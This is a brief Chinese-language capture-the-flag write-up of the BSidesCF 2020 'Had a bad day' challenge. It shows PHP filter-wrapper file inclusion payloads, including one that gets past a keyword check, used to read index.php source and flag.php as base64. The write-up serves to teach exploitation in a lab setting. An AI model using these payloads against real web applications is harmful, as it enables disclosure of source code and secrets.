[BSidesCF 2020]Had a bad day

发布时间 2023-10-20 01:08:29作者: Alpsa

进入靶场

 点击WOOFERS和MEOWERS

 

 点击两个按钮都护出现index.php?category=meowers   判断可能纯在SQL注入和文件包含

使用php伪协议尝试文件包含:

?category=php://filter/read=convert.base64-encode/resource=index.php

 

 

 这里报错说后端文件拼接了.php  所以我们尝试payload:

?category=php://filter/read=convert.base64-encode/resource=index

 

 出现了一段base64编码,直接base64解码得到源码

 我截取了一段重要的代码,我们对这段代码进行分析,传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php
尝试直接payload:

/index.php?category=php://filter/read=convert.base64-encode/index/resource=flag

 又出现了一段base64,直接解码

 拿到flag,本题结束。